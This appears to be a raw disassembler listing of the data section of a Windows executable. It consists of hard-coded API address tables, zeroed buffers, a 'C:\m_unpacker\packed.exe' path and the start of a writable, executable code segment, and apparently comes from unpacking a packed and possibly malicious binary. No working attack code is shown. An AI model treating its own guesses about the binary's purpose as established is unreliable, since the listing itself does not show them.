byte_435369 db 0 ; DATA XREF: sub_40532B+14C�w
word_43536A dw 0 ; DATA XREF: sub_40532B+153�w
dword_43536C dd 0 ; DATA XREF: sub_40532B+180�w
; sub_40532B+19B�w
dword_435370 dd 0 ; DATA XREF: sub_40532B+1A3�w
byte_435374 db 0 ; DATA XREF: sub_40532B+1B2�w
byte_435375 db 0 ; DATA XREF: sub_40532B+1C2�w
word_435376 dw 0 ; DATA XREF: sub_40532B+1D5�w
word_435378 dw 0 ; DATA XREF: sub_40532B+1E7�w
word_43537A dw 0 ; DATA XREF: sub_40532B+1DD�w
dword_43537C dd 100h dup(0) ; DATA XREF: sub_40532B+1FD�o
dword_43577C dd 71AB5690h ; DATA XREF: sub_40398A+C4�r
; sub_40398A+F8�r ...
dword_435780 dd 71AB157Eh ; DATA XREF: sub_405770+600�w
; sub_405770+72C�r ...
dword_435784 dd 71C574FAh ; DATA XREF: sub_405770+946�w
; sub_405770+9AE�r ...
dword_435788 dd 7620E8C3h ; DATA XREF: sub_405770+7E1�w
; sub_405770+834�r
dword_43578C dd 71AB5A01h ; DATA XREF: sub_4021B5+4B�r
; sub_405770+4C8�w ...
dword_435790 dd 762211EFh ; DATA XREF: sub_405770+786�w
; sub_405770+7F5�r ...
dword_435794 dd 77E6C0E3h ; DATA XREF: sub_402B74+4�r
; sub_405770+8C�w ...
dword_435798 dd 77D5E303h ; DATA XREF: sub_405770+1A6�w
; sub_405770+1E2�r ...
dword_43579C dd 77D45B19h ; DATA XREF: sub_405770+172�w
; sub_405770+1C2�r
dword_4357A0 dd 71AB1444h ; DATA XREF: sub_405770+5AC�w
; sub_405770+6FC�r ...
dword_4357A4 dd 77C71BB0h ; DATA XREF: sub_405770+415�w
; sub_405770+463�r
dword_4357A8 dd 71B28D0Dh ; DATA XREF: sub_405770+AC7�w
dword_4357AC dd 71AB155Ah ; DATA XREF: sub_4018CA+4C�r
; sub_404EE8+B1�r ...
dword_4357B0 dd 7620AFB6h ; DATA XREF: sub_405770+7C7�w
; sub_405770+7FB�r
dword_4357B4 dd 77D5E310h ; DATA XREF: sub_405770+18C�w
; sub_405770+1D2�r ...
dword_4357B8 dd 77EBA6E9h ; DATA XREF: sub_405770+58�w
; sub_405770+CA�r ...
dword_4357BC dd 71C4A1B4h ; DATA XREF: sub_405770+92C�w
; sub_405770+99E�r ...
dword_4357C0 dd 71AB3E5Dh ; DATA XREF: sub_4018CA+59�r
; sub_40398A+8D�r ...
dword_4357C4 dd 1F7BA3A9h ; DATA XREF: sub_405770+B6B�w
; sub_405770+BA6�r ...
dword_4357C8 dd 77DD23D7h ; DATA XREF: sub_405770+24B�w
; sub_405770+27C�r
dword_4357CC dd 71AB868Dh ; DATA XREF: sub_404EE8+117�r
; sub_405770+5E6�w ...
dword_4357D0 dd 1F7B9D96h ; DATA XREF: sub_405770+B9F�w
; .text:00413DE1�r
dword_4357D4 dd 71C4502Ch ; DATA XREF: sub_405770+953�w
; sub_405770+9B6�r ...
dword_4357D8 dd 71AB1ED3h ; DATA XREF: sub_4021B5+29B�r
; sub_40532B+228�r ...
dword_4357DC dd 773F97B0h ; DATA XREF: sub_405770+B21�w
dword_4357E0 dd 77E78C17h ; DATA XREF: sub_405770+31�w
; sub_405770+AD�r ...
dword_4357E4 dd 71B2A381h ; DATA XREF: sub_405770+ABA�w
; sub_405770+AD6�r ...
dword_4357E8 dd 71C453F8h ; DATA XREF: sub_405770+96D�w
; sub_405770+9C6�r ...
dword_4357EC dd 77DD59F0h ; DATA XREF: sub_40213F+4E�r
; sub_405770+23E�w ...
dword_4357F0 dd 71C2498Bh ; DATA XREF: sub_405770+905�w
; sub_405770+981�r ...
dword_4357F4 dd 71C4576Ch ; DATA XREF: sub_405770+97A�w
; sub_405770+9CE�r ...
dword_4357F8 dd 77EBB1E7h ; DATA XREF: sub_405770+3E�w
; sub_405770+BA�r ...
dword_4357FC dd 77E2C1B3h ; DATA XREF: sub_405770+321�w
; sub_405770+367�r ...
dword_435800 dd 77D49A11h ; DATA XREF: sub_405770+17F�w
; sub_405770+1CA�r
dword_435804 dd 77E686CCh ; DATA XREF: sub_402BBD+1B�r
; sub_405770+72�w ...
dword_435808 dd 71AB3C22h ; DATA XREF: sub_4018CA+18�r
; sub_40398A+45�r ...
dword_43580C dd 71C24870h ; DATA XREF: sub_405770+912�w
; sub_405770+98E�r ...
dword_435810 dd 76214750h ; DATA XREF: sub_4025CE+3A�r
; sub_405770+7D4�w ...
dword_435814 dd 76D674FAh ; DATA XREF: sub_405770+A56�w
; sub_405770+A5D�r ...
dword_435818 dd 71AB41DAh ; DATA XREF: sub_4021B5+2B�r
; sub_404999+16�r ...
dword_43581C dd 71C3516Ah ; DATA XREF: sub_405770+987�w
; sub_4076B0+72�r
dword_435820 dd 77EBA994h ; DATA XREF: sub_405770+65�w
; sub_4081CA+15C�r ...
dword_435824 dd 71AB3F8Dh ; DATA XREF: sub_4021B5+6A�r
; sub_40532B+76�r ...
dword_435828 dd 77E6CBF9h ; DATA XREF: sub_405770+99�w
; sub_405770+EA�r ...
dword_43582C dd 1F7CD214h ; DATA XREF: sub_405770+B85�w
; sub_405770+BB6�r ...
dword_435830 dd 76206853h ; DATA XREF: sub_405770+7A0�w
; sub_405770+810�r
dword_435834 dd 77C72C6Bh ; DATA XREF: sub_405770+42F�w
; sub_405770+473�r
dword_435838 dd 77DDAB2Fh ; DATA XREF: sub_405770+32E�w
; sub_405770+36F�r ...
dword_43583C dd 76206B7Fh ; DATA XREF: sub_405770+7BA�w
; sub_405770+820�r
dword_435840 dd 71C214BAh ; DATA XREF: sub_405770+939�w
; sub_405770+9A6�r ...
dword_435844 dd 77DD5C55h ; DATA XREF: sub_40213F+5A�r
; sub_405770+258�w ...
dword_435848 dd 71ABF628h ; DATA XREF: sub_405770+634�w
; sub_40F4D9+E3�r
dword_43584C dd 77E802FCh ; DATA XREF: sub_405770+A6�w
; sub_405770+F2�r
dword_435850 dd 77DD590Bh ; DATA XREF: sub_40213F+2A�r
; sub_405770+231�w ...
dword_435854 dd 77EBA595h ; DATA XREF: sub_405770+4B�w
; sub_405770+C2�r ...
dword_435858 dd 76D629BBh ; DATA XREF: sub_405770+8A2�w
; sub_405770+8B6�r ...
dword_43585C dd 71AB1B7Bh ; DATA XREF: sub_404EE8+F2�r
; sub_405770+4E2�w ...
dword_435860 dd 77D4BDCAh ; DATA XREF: sub_405770+165�w
; sub_405770+1BA�r ...
dword_435864 dd 76204E4Dh ; DATA XREF: sub_4025CE+4FF�r
; sub_405770+801�w
dword_435868 dd 71AB2BBFh ; DATA XREF: sub_405770+61A�w
; sub_405770+73C�r ...
dword_43586C dd 76F36EEBh ; DATA XREF: sub_405770+A19�w
dword_435870 dd 77DDA595h ; DATA XREF: sub_405770+2C2�w
; sub_40815F+55�r
dword_435874 dd 76D67A29h ; DATA XREF: sub_405770+A63�w
; sub_407C37+98�r
dword_435878 dd 77C7531Dh ; DATA XREF: sub_405770+3FB�w
; sub_405770+453�r
dword_43587C dd 71AB12F8h ; DATA XREF: sub_401B9D+2F�r
; sub_40398A+25�r ...
dword_435880 dd 77C7212Fh ; DATA XREF: sub_405770+3EE�w
; sub_405770+44B�r
dword_435884 dd 77C72889h ; DATA XREF: sub_405770+43C�w
dword_435888 dd 71AB401Ch ; DATA XREF: sub_4010CA+1F�r
; sub_401967+77�r ...
dword_43588C dd 76D62A37h ; DATA XREF: sub_405770+8AF�w
; sub_405770+8C3�r ...
dword_435890 dd 77C729E2h ; DATA XREF: sub_405770+422�w
; sub_405770+46B�r
dword_435894 dd 71AB60C9h ; DATA XREF: sub_405770+4D5�w
; sub_405770+658�r ...
dword_435898 dd 77DDACABh ; DATA XREF: sub_405770+397�w
; sub_4116D2+ED�r
dword_43589C dd 71AB1AF4h ; DATA XREF: sub_40398A+A2�r
; sub_40398A+E2�r ...
dword_4358A0 dd 77D902E3h ; DATA XREF: sub_405770+1B3�w
; sub_4069D5+15�r
dword_4358A4 dd 77E96645h ; DATA XREF: sub_402DDF+14�r
; sub_402DDF+2B�r ...
dword_4358A8 dd 71B2ACCBh ; DATA XREF: sub_405770+AA0�w
; sub_405770+AC1�r ...
dword_4358AC dd 71AB1890h ; DATA XREF: sub_4018CA+82�r
; sub_404EE8+3C4�r ...
dword_4358B0 dd 77E6D75Bh ; DATA XREF: sub_405770+B3�w
dword_4358B4 dd 7620BD61h ; DATA XREF: sub_4025CE+F4�r
; sub_405770+7EE�w ...
dword_4358B8 dd 1F7CB8F8h ; DATA XREF: sub_405770+B92�w
; sub_405770+BBE�r ...
dword_4358BC dd 77C75455h ; DATA XREF: sub_405770+408�w
; sub_405770+45B�r
dword_4358C0 dd 71AB1740h ; DATA XREF: sub_4021B5+2AA�r
; sub_40489A+A1�r ...
dword_4358C4 dd 77DDA20Bh ; DATA XREF: sub_405770+2ED�w
; sub_405770+342�r ...
dword_4358C8 dd 77D4702Fh ; DATA XREF: sub_405770+158�w
; sub_405770+1AD�r ...
dword_4358CC dd 77DE8075h ; DATA XREF: sub_405770+307�w
; sub_405770+357�r ...
dword_4358D0 dd 71C45229h ; DATA XREF: sub_405770+960�w
; sub_405770+9BE�r ...
dword_4358D4 dd 77DDA2AFh ; DATA XREF: sub_405770+33B�w
; sub_405770+377�r ...
dword_4358D8 dd 71AB12A7h ; DATA XREF: sub_401505+E�r
; sub_405770+57E�w ...
dword_4358DC dd 71AB14DCh ; DATA XREF: sub_405770+4EF�w
; sub_405770+664�r
dword_4358E0 dd 71AB3ECEh ; DATA XREF: sub_404EE8+85�r
; sub_405770+5BF�w ...
dword_4358E4 dd 77DD189Ah ; DATA XREF: sub_40213F+63�r
; sub_405770+265�w ...
dword_4358E8 dd 77DE1291h ; DATA XREF: sub_405770+314�w
; sub_405770+35F�r ...
dword_4358EC dd 76F36EAAh ; DATA XREF: sub_405770+A0C�w
; sub_405770+A13�r ...
dword_4358F0 dd 76D62A58h ; DATA XREF: sub_405770+8BC�w
; sub_407DBB+116�r
dword_4358F4 dd 1F7D886Ah ; DATA XREF: sub_405770+B5E�w
; sub_405770+B99�r ...
dword_4358F8 dd 71ABD755h ; DATA XREF: sub_405770+627�w
; sub_405770+744�r ...
dword_4358FC dd 71AB1746h ; DATA XREF: sub_405770+571�w
; sub_405770+6DC�r
dword_435900 dd 77DD7496h ; DATA XREF: sub_405770+348�w
; sub_4078A2+AB�r
dword_435904 dd 0 ; DATA XREF: sub_405770+112�w
dword_435908 dd 71C2FA86h ; DATA XREF: sub_405770+91F�w
; sub_405770+996�r ...
dword_43590C dd 1F7CD927h ; DATA XREF: sub_405770+B78�w
; sub_405770+BAE�r ...
dword_435910 dd 77428B97h ; DATA XREF: sub_405770+B14�w
; sub_405770+B1B�r ...
dword_435914 dd 71AB1A6Dh ; DATA XREF: sub_4018CA+8B�r
; sub_4021B5+2DA�r ...
dword_435918 dd 77C76551h ; DATA XREF: sub_405770+3E1�w
; sub_405770+443�r
dword_43591C dd 71AB32CAh ; DATA XREF: sub_405770+60D�w
; sub_405770+734�r
dword_435920 dd 71AB1836h ; DATA XREF: sub_4021B5:loc_402495�r
; sub_4025CE+48F�r ...
dword_435924 dd 77DF7311h ; DATA XREF: sub_405770+2B5�w
; sub_405770+2C9�r ...
dword_435928 dd 71AB5DE2h ; DATA XREF: sub_404EE8+99�r
; sub_405770+5D9�w ...
dword_43592C dd 71AB12A7h ; DATA XREF: sub_401505+16�r
; sub_4021B5+E3�r ...
dword_435930 dd 77DD22EAh ; DATA XREF: sub_405770+224�w
; sub_405770+25F�r ...
dword_435934 dd 77D5E38Ch ; DATA XREF: sub_405770+199�w
; sub_405770+1DA�r ...
dword_435938 dd 71B22C25h ; DATA XREF: sub_405770+AAD�w
; sub_405770+ACE�r
dword_43593C dd 77DD5D20h ; DATA XREF: sub_405770+2A8�w
; sub_405770+2BC�r ...
dword_435940 dd 77DE801Bh ; DATA XREF: sub_405770+2FA�w
; sub_405770+34F�r ...
dword_435944 dd 77C76B34h ; DATA XREF: sub_405770+3D4�w
; sub_405770+436�r
dword_435948 dd 0CC0004h ; DATA XREF: sub_4025CE+34�r
; sub_405770+863�w ...
dword_43594C dd 762059A3h ; DATA XREF: sub_405770+7AD�w
; sub_405770+818�r
dword_435950 dd 7622A3F4h ; DATA XREF: sub_405770+793�w
; sub_405770+808�r ...
dword_435954 dd 71AB1746h ; DATA XREF: sub_4018CA+38�r
; sub_4021B5+83�r ...
dword_435958 dd 0 ; DATA XREF: sub_405770:loc_40586E�w
; sub_405770+12B�w ...
dword_43595C dd 0 ; DATA XREF: sub_405770+126�w
; sub_406359+1C�r
dword_435960 dd 0 ; DATA XREF: sub_405770:loc_40596B�w
; sub_406359:loc_4063A1�r
dword_435964 dd 0 ; DATA XREF: sub_405770+1F6�w
; sub_406359+50�r
dword_435968 dd 0 ; DATA XREF: sub_405770:loc_405A00�w
; sub_405770:loc_405A45�w ...
dword_43596C dd 0 ; DATA XREF: sub_405770+3A6�w
; sub_406359+84�r
dword_435970 dd 0 ; DATA XREF: sub_405770:loc_405BFC�w
; sub_406359:loc_406409�r
dword_435974 dd 0 ; DATA XREF: sub_405770+487�w
; sub_406359+B8�r
dword_435978 dd 0 ; DATA XREF: sub_405770:loc_405ECD�w
; sub_406359:loc_40643D�r
dword_43597C dd 0 ; DATA XREF: sub_405770+758�w
; sub_406359+EC�r
dword_435980 dd 0 ; DATA XREF: sub_405770:loc_405FB8�w
; sub_405770+877�w ...
dword_435984 dd 0 ; DATA XREF: sub_405770+872�w
; sub_406359+120�r
dword_435988 dd 0 ; DATA XREF: sub_405770:loc_40604C�w
; sub_406359:loc_4064A5�r ...
dword_43598C dd 0 ; DATA XREF: sub_405770+8D7�w
; sub_406359+154�r
dword_435990 dd 0 ; DATA XREF: sub_405770:loc_406157�w
; sub_406359:loc_4064D9�r ...
dword_435994 dd 0 ; DATA XREF: sub_405770+9E2�w
; sub_406359+188�r
dword_435998 dd 0 ; DATA XREF: sub_405770:loc_4061A1�w
; sub_406359:loc_40650D�r
dword_43599C dd 0 ; DATA XREF: sub_405770+A2C�w
; sub_406359+1BC�r
dword_4359A0 dd 0 ; DATA XREF: sub_405770:loc_4061EB�w
; sub_406359:loc_406541�r
dword_4359A4 dd 0 ; DATA XREF: sub_405770+A76�w
; sub_406359+1F0�r
dword_4359A8 dd 0 ; DATA XREF: sub_405770:loc_40625F�w
; sub_406359:loc_406575�r
dword_4359AC dd 0 ; DATA XREF: sub_405770+AEA�w
; sub_406359+224�r
dword_4359B0 dd 0 ; DATA XREF: sub_405770:loc_4062A9�w
; sub_406359:loc_4065A9�r
dword_4359B4 dd 0 ; DATA XREF: sub_405770+B34�w
; sub_406359+258�r
dword_4359B8 dd 0 ; DATA XREF: sub_405770:loc_406347�w
; sub_406359:loc_4065DD�r
dword_4359BC dd 0 ; DATA XREF: sub_405770+BD2�w
; sub_406359+28C�r
dd 2 dup(0)
dword_4359C8 dd 80h dup(0) ; DATA XREF: sub_4067EA+6D�o
dword_435BC8 dd 17h dup(0) ; DATA XREF: sub_406D2D:loc_406E46�o
; sub_406D2D+12D�o ...
dword_435C24 dd 0 ; DATA XREF: sub_407028:loc_40707B�w
; sub_407028+5B�r ...
dword_435C28 dd 0 ; DATA XREF: sub_407028+33�r
; sub_407028+3E�w ...
align 10h
dword_435C30 dd 18h dup(0) ; DATA XREF: sub_407580:loc_40769E�o
; sub_407580+12A�o
dword_435C90 dd 80h dup(0) ; DATA XREF: sub_4076B0+81�o
; sub_4076B0+A9�o
dword_435E90 dd 80h dup(0) ; DATA XREF: sub_40776C:loc_4077A4�o
; sub_40776C+60�o
dword_436090 dd 80h dup(0) ; DATA XREF: sub_4077E4+51�o
; sub_4077E4+83�o ...
dword_436290 dd 80h dup(0) ; DATA XREF: sub_4079C1+68�o
; sub_4079C1+8E�o ...
dword_436490 dd 4 dup(0) ; DATA XREF: sub_407D15+42�o
dword_4364A0 dd 0 ; DATA XREF: sub_401967+96�r
; sub_4025CE+14E�o ...
dd 7Fh dup(0)
dword_4366A0 dd 0 ; DATA XREF: sub_41229A+4C�w
; sub_412383+3E�w ...
dword_4366A4 dd 0 ; DATA XREF: sub_401967+6D�r
; sub_401967:loc_401B79�r ...
dword_4366A8 dd 0 ; DATA XREF: sub_40F292+15E�w
; sub_410547+A2�w ...
dword_4366AC dd 0 ; DATA XREF: sub_402E5D+C�r
; sub_404EE8+78�w ...
dword_4366B0 dd 0 ; DATA XREF: sub_40EC10+6D�r
; sub_40EC10:loc_40EC8D�r ...
dword_4366B4 dd 0 ; DATA XREF: sub_401141+122�w
; sub_401141+26F�w ...
byte_4366B8 db 0 ; DATA XREF: sub_40887D+57�o
; sub_4089DC+2392�r ...
align 4
dd 3C25h dup(0)
dword_445750 dd 0D6B8h dup(0) ; DATA XREF: .rdata:off_4211C0�o
dword_47B230 dd 0 ; DATA XREF: sub_40E6BB:loc_40EB22�o
; sub_41229A+13�o ...
dword_47B234 dd 20h dup(0) ; DATA XREF: sub_40E6BB+3FF�o
; sub_40E6BB+4B8�o ...
dword_47B2B4 dd 10h dup(0) ; DATA XREF: sub_40E6BB+41B�o
dword_47B2F4 dd 24h dup(0) ; DATA XREF: sub_40E6BB+432�o
dword_47B384 dd 0 ; DATA XREF: sub_40E6BB+421�w
; sub_40E6BB+4CF�w ...
dword_47B388 dd 0 ; DATA XREF: sub_40E6BB+440�w
dd 3 dup(0)
dword_47B398 dd 0 ; DATA XREF: sub_401DEF+5�o
; sub_401DEF+62�r ...
dd 5 dup(0)
dword_47B3B0 dd 0 ; DATA XREF: sub_401DEF+7D�r
; sub_4089DC+9D6�r
dd 1Fh dup(0)
dword_47B430 dd 0 ; DATA XREF: sub_41248A+16�o
; sub_4124A9+19�o
dword_47B434 dd 2B9h dup(0) ; DATA XREF: sub_41243D+3D�o
dword_47BF18 dd 1Bh ; DATA XREF: sub_401000:loc_40106E�r
; sub_401DEF+47�o ...
dword_47BF1C dd 0 ; DATA XREF: sub_40E6BB+139�r
byte_47BF20 db 0 ; DATA XREF: sub_408601+2A�r
; sub_408601+33�o
align 4
dword_47BF24 dd 0 ; DATA XREF: sub_4089DC+5CD5�w
; sub_40E6BB+46C�w ...
dword_47BF28 dd 0 ; DATA XREF: sub_4089DC+91D�r
; sub_40E6BB+404�w
dword_47BF2C dd 0 ; DATA XREF: sub_40F039+20�r
; sub_40F292+87�o
dword_47BF30 dd 0 ; DATA XREF: sub_40F105+D3�r
; sub_40F105+119�r ...
dword_47BF34 dd 0 ; DATA XREF: sub_40F009:loc_40F01D�r
; sub_40F292+115�w
dword_47BF38 dd 0 ; DATA XREF: sub_40F009�r
; sub_40F105+32�r ...
dword_47BF3C dd 0Dh dup(0) ; DATA XREF: sub_40F105+CE�o
; sub_40F105+114�o ...
dword_47BF70 dd 0 ; DATA XREF: sub_40F009:loc_40F02A�r
; sub_40F105+53�r ...
align 8
dword_47BF78 dd 0 ; DATA XREF: sub_40F4D9+15C�r
align 10h
dword_47BF80 dd 80h dup(0) ; DATA XREF: sub_40FD09+8A�o
byte_47C180 db 0 ; DATA XREF: sub_410B55:loc_410BB2�r
; sub_410B55+93�w
align 4
dword_47C184 dd 0Eh dup(0) ; DATA XREF: sub_411551+40�o
dword_47C1BC dd 0 ; DATA XREF: sub_414D2D+A�w
dword_47C1C0 dd 0 ; DATA XREF: sub_41D38D+14A�r
dword_47C1C4 dd 2 ; DATA XREF: .text:00416142�w
; sub_417F18�r ...
dword_47C1C8 dd 0A28h ; DATA XREF: .text:00416162�w
; .text:00416173�w
dword_47C1CC dd 501h ; DATA XREF: .text:0041617E�w
dword_47C1D0 dd 5 ; DATA XREF: .text:0041614B�w
; sub_417F18+9�r ...
dword_47C1D4 dd 1 ; DATA XREF: .text:00416153�w
dword_47C1D8 dd 1 ; DATA XREF: sub_40E6BB:loc_40E9A6�r
; sub_41B9A9+8F�w
dword_47C1DC dd 342998h ; DATA XREF: sub_40E6BB+2F4�r
; sub_40E6BB+314�r ...
dd 0
dword_47C1E4 dd 3429B8h ; DATA XREF: sub_41B776+48�w
; sub_41B776:loc_41B827�r ...
dd 3 dup(0)
off_47C1F4 dd offset aCM_unpackerPac ; DATA XREF: sub_41B9A9+37�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_47C1FC db 0 ; DATA XREF: sub_415DF0+35�w
; sub_417E14+5�r
align 10h
dword_47C200 dd 0 ; DATA XREF: sub_415DF0+2F�w
dword_47C204 dd 0 ; DATA XREF: sub_415DF0+F�r
; sub_415DF0+C1�w
dword_47C208 dd 0 ; DATA XREF: .text:0041622E�w
; sub_41B776:loc_41B788�r ...
align 10h
dword_47C210 dd 0 ; DATA XREF: sub_4160D0�r sub_4160F5�r ...
align 10h
dword_47C220 dd 0 ; DATA XREF: sub_4192C8+14C�w
; sub_41A95C:loc_41A985�w ...
align 8
dword_47C228 dd 77FC5940h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_417F83+4�o
; .data:off_42DC10�o
dd 77FC5960h, 0FFFFFFFFh, 4 dup(0)
dd 77FC5980h, 0FFFFFFFFh, 4 dup(0)
dd 77FC59A0h, 0FFFFFFFFh, 4 dup(0)
dword_47C288 dd 77FC59C0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:0042DC40�o
dd 77FC59E0h, 0FFFFFFFFh, 4 dup(0)
dd 77FC5A00h, 0FFFFFFFFh, 4 dup(0)
dword_47C2D0 dd 77FC5A20h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:0042DC60�o
dword_47C2E8 dd 77FC5A40h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:0042DC70�o
dd 143D48h, 0FFFFFFFFh, 4 dup(0)
dd 143D70h, 0FFFFFFFFh, 4 dup(0)
dword_47C330 dd 143D98h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:0042DC90�o
dd 143DC0h, 0FFFFFFFFh, 4 dup(0)
dd 143DE8h, 0FFFFFFFFh, 4 dup(0)
dword_47C378 dd 0 ; DATA XREF: sub_4192AD�r
dword_47C37C dd 0 ; DATA XREF: sub_4149EA+147�r
; sub_4149EA+192�r ...
dword_47C380 dd 1 ; DATA XREF: sub_419C39+E�r
; sub_419C39+31�w ...
dd 2 dup(0)
dword_47C38C dd 1 ; DATA XREF: sub_41AC67:loc_41ADD4�r
; sub_41ADFD+1D�w ...
dword_47C390 dd 0 ; DATA XREF: sub_41B570+21�r
align 8
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_41B9A9+23�o
; .data:off_47C1F4�o
align 4
dd 3Ah dup(0)
byte_47C49C db 0 ; DATA XREF: sub_41B9A9:loc_41B9C0�w
align 10h
dword_47C4A0 dd 1 ; DATA XREF: sub_41BA4B+2�r
; sub_41BA4B+24�w ...
dword_47C4A4 dd 1 ; DATA XREF: sub_41C3E0+E�r
; sub_41C3E0+2E�w ...
dword_47C4A8 dd 0 ; DATA XREF: .data:off_42E1D8�o
; .data:off_42E1DC�o ...
dword_47C4AC dd 0 ; DATA XREF: sub_4178F2+9C�r
dword_47C4B0 dd 0 ; DATA XREF: sub_4178F2+B�r
dd 0Bh dup(0)
dword_47C4E0 dd 0 ; DATA XREF: sub_419C39+265�r
; sub_41C3E0+14A�r ...
align 10h
dword_47C4F0 dd 0 ; DATA XREF: sub_419C39+9D�r
; sub_419C39+272�r ...
dd 0Ah dup(0)
dword_47C51C dd 77E7C706h ; DATA XREF: sub_41CFB8+C�r
; sub_41CFB8+39�w ...
dword_47C520 dd 0 ; DATA XREF: sub_4192C8+7�r
dword_47C524 dd 0 ; DATA XREF: sub_41DFF5+1A�r
dword_47C528 dd 77C26E79h ; DATA XREF: sub_41DFF5:loc_41E162�r
; sub_41DFF5+182�r ...
dword_47C52C dd 0 ; DATA XREF: sub_41E283+9�r
; sub_41E283+38�w ...
dword_47C530 dd 0 ; DATA XREF: sub_41E283+4D�w
; sub_41E283:loc_41E348�r
dword_47C534 dd 0 ; DATA XREF: sub_41E283+5B�w
; sub_41E283+D6�r
dword_47C538 dd 0 ; DATA XREF: sub_41E283+7B�w
; sub_41E283:loc_41E303�r
dword_47C53C dd 0 ; DATA XREF: sub_41E283+6C�w
; sub_41E283+9C�r
dd 30h dup(0)
dword_47C600 dd 0 ; DATA XREF: sub_41D38D+3D�r
dword_47C604 dd 0 ; DATA XREF: sub_41EE93:loc_41EF15�o
; sub_41EE93+87�r
dword_47C608 dd 0 ; DATA XREF: sub_41EE93:loc_41EEDB�o
; sub_41EE93+4D�r
dword_47C60C dd 0 ; DATA XREF: sub_41EE93:loc_41EECE�o
; sub_41EE93+40�r
dword_47C610 dd 0 ; DATA XREF: sub_41EE93:loc_41EEE8�o
; sub_41EE93+5A�r
dd 4 dup(0)
dword_47C624 dd 0 ; DATA XREF: sub_41F4EA+11�r
; sub_41F4EA+31�w ...
dword_47C628 dd 0 ; DATA XREF: sub_41F79A+11�r
; sub_41F79A+2E�w ...
dword_47C62C dd 0 ; DATA XREF: sub_4178F2+79�r
dword_47C630 dd 0 ; DATA XREF: sub_4178F2+29�r
dword_47C634 dd 0 ; DATA XREF: sub_4178F2+4C�r
dword_47C638 dd 20h ; DATA XREF: sub_417B3C+F�r
; sub_418EB7+F�r ...
align 10h
dword_47C640 dd 341F20h ; DATA XREF: sub_4162EB+AC�r
; sub_417AB9+5B�r ...
dword_47C644 dd 3Fh dup(0) ; DATA XREF: sub_41BB6D+9A�o
dword_47C740 dd 0 ; DATA XREF: sub_41AA3D+1A�w
; sub_41AA66+87�r ...
dword_47C744 dd 342770h ; DATA XREF: sub_41ABF8+28�r
; sub_41ABF8:loc_41AC37�r ...
dword_47C748 dd 0 ; DATA XREF: sub_41AA3D+15�w
; sub_41AC67+F5�w ...
dd 5 dup(0)
byte_47C760 db 0 ; DATA XREF: sub_41AA3D+6�o
; sub_41AC67+55�o ...
byte_47C761 db 0 ; DATA XREF: sub_415B3D+5E�r
; sub_41AA66+107�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_47C864 dd 4E4h ; DATA XREF: sub_41AA3D+10�w
; sub_41AA66+19�r ...
align 10h
word_47C870 dw 0 ; DATA XREF: sub_41AA3D+1F�o
; sub_41AC67+10C�o ...
align 10h
byte_47C880 db 0 ; DATA XREF: sub_41AA66:loc_41AB7B�w
; sub_41AA66:loc_41AB98�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
dword_47C980 dd 0 ; DATA XREF: sub_4180E6+21�w
; sub_418159+21C�r ...
dword_47C984 dd 0 ; DATA XREF: sub_4180E6+28�w
; sub_41812E�r ...
dword_47C988 dd 0 ; DATA XREF: sub_4180E6+15�w
; sub_41812E+8�r ...
dword_47C98C dd 0 ; DATA XREF: sub_4149EA+6C�r
; sub_414C06+18�r ...
dword_47C990 dd 0 ; DATA XREF: sub_4180E6+2F�w
; sub_418159+300�w ...
dword_47C994 dd 0 ; DATA XREF: sub_4180E6+3C�w
; sub_418471+5�r ...
dword_47C998 dd 0 ; DATA XREF: sub_418159+229�r
; sub_418159+249�r ...
dword_47C99C dd 340000h ; DATA XREF: sub_414844+5F�r
; sub_4149EA+DA�r ...
dword_47C9A0 dd 1 ; DATA XREF: sub_414844+13�r
; sub_4149EA:loc_414A20�r ...
dword_47C9A4 dd 342EF0h ; DATA XREF: sub_417C8D+30�r
; sub_417C8D+51�r ...
dd 6 dup(0)
dword_47C9C0 dd 400h dup(0) ; DATA XREF: .data:off_42D988�o
; .data:0042D990�o
dword_47D9C0 dd 200h ; DATA XREF: sub_417C8D+24�r
; sub_417D6B�r ...
dword_47D9C4 dd 142340h ; DATA XREF: .text:00416224�w
; sub_41B70D+F�r ...
dword_47D9C8 dd 1 ; DATA XREF: sub_41B776+9F�w
dword_47D9CC dd 3436FCh ; DATA XREF: sub_415DF0+46�r
; sub_415DF0:loc_415E4A�r ...
dword_47D9D0 dd 3436F8h ; DATA XREF: sub_415DF0+3C�r
; sub_415DF0+62�r ...
dword_47D9D4 dd 1 ; DATA XREF: sub_41AF4D�r
; sub_41AF4D+11�w ...
_data ends
; Section 4. (virtual address 0007E000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 0007E000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
fuck segment para public 'CODE' use32
assume cs:fuck
;org 47E000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 3 dup(0)
